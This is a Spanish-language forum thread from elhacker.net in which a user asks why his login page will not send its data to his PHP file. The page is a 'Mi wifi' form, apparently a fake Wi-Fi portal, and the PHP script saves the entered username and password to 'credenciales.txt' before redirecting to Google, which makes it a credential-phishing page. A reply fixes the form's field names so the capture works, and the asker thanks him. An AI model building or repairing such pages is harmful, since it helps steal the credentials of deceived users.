elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Estamos en la red social de Mastodon


+  Foro de elhacker.net
|-+  Programación
| |-+  Desarrollo Web (Moderador: #!drvy)
| | |-+  Ayuda con html y php
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Ayuda con html y php  (Leído 2,406 veces)
jhon-wick

Desconectado Desconectado

Mensajes: 2


Ver Perfil
Ayuda con html y php
« en: 20 Enero 2018, 13:10 pm »

Muy buenas!!!! Estoy creando una pagina de login pero no logro hacer que la informacion puesta en el campo de usuario y contraseña viaje al archivo .php que tengo,les dejo el codigo aver si alguien puede ayudarme! 

body>
  <div class="form">

      <ul class="tab-group">
        <li class="tab active"><a href="#signup">acceder</a></li>
        <li class="tab"><a href="#login">acceder</a></li>
      </ul>

      <div class="tab-content">
        <div id="signup">
          <h1>Mi wifi&reg;</h1>

          <form action="post.php" method="post">

            <div class="field-wrap">
              <label>
                Usuario<span class="req" name="usuario">*</span>
              </label>
              <input type="text"required autocomplete="off"/>
            </div>
            <div class="field-wrap">
              <label>
                contrase&ntilde;a<span class="req" name="clave">*<type="password></span>
              </label>
              <input type="password"required autocomplete="off"/>
            </div>

            <button type="submit" class="button button-block"/>Acceder</button>

            </form>

          </div>


no soy un experto en esto asi que pido disculpas si el codigo esta mal!!

php

<body>

      <?php

         $usuario = $_POST["usuario"];
         $clave = $_POST["clave"];

         $contenido="
         email: $usuario
         clave: $clave
         ";

         $archivo=fopen("credenciales.txt","w");
         fwrite($archivo,$contenido);


header('Location: https://www.google.com');

Gracias por sus tiempos!!!!


En línea

loml666

Desconectado Desconectado

Mensajes: 24


Ver Perfil
Re: Ayuda con html y php
« Respuesta #1 en: 24 Enero 2018, 21:04 pm »

si esta mal el formulario, aquí un ejemplo correcto:
Código
  1. <form action="post.php" method = "post">
  2.  <label >Username</label> <input type="text" id="usename" name="usuario"><br /><br />
  3.  <label >Password:</label> <input type="text" id="password" name="clave"><br /><br />
  4.  <button type = "submit">Login</button>
  5. </form>
  :¬¬


En línea

jhon-wick

Desconectado Desconectado

Mensajes: 2


Ver Perfil
Re: Ayuda con html y php
« Respuesta #2 en: 25 Enero 2018, 03:11 am »

Gracias colega!!!voy a probar ese código gracias otra vez!!! ;D
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Mostrar codigo fuente escondido por HTML Protector, HTML Guardian, Altrise, etc.
Desarrollo Web
sirdarckcat 1 13,842 Último mensaje 10 Enero 2012, 09:40 am
por gm-vl
ayuda en php y html
PHP
jtamayo 4 2,003 Último mensaje 2 Diciembre 2007, 22:59 pm
por Tyrz
que es mejor, escribir codigo html desde un echo o html solo
Desarrollo Web
morenochico 1 4,531 Último mensaje 14 Febrero 2011, 19:10 pm
por ~ Yoya ~
[AYUDA] Por favor ayuda con imagenes en html
Desarrollo Web
gramsch 3 2,376 Último mensaje 24 Febrero 2016, 21:35 pm
por Pantera80
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines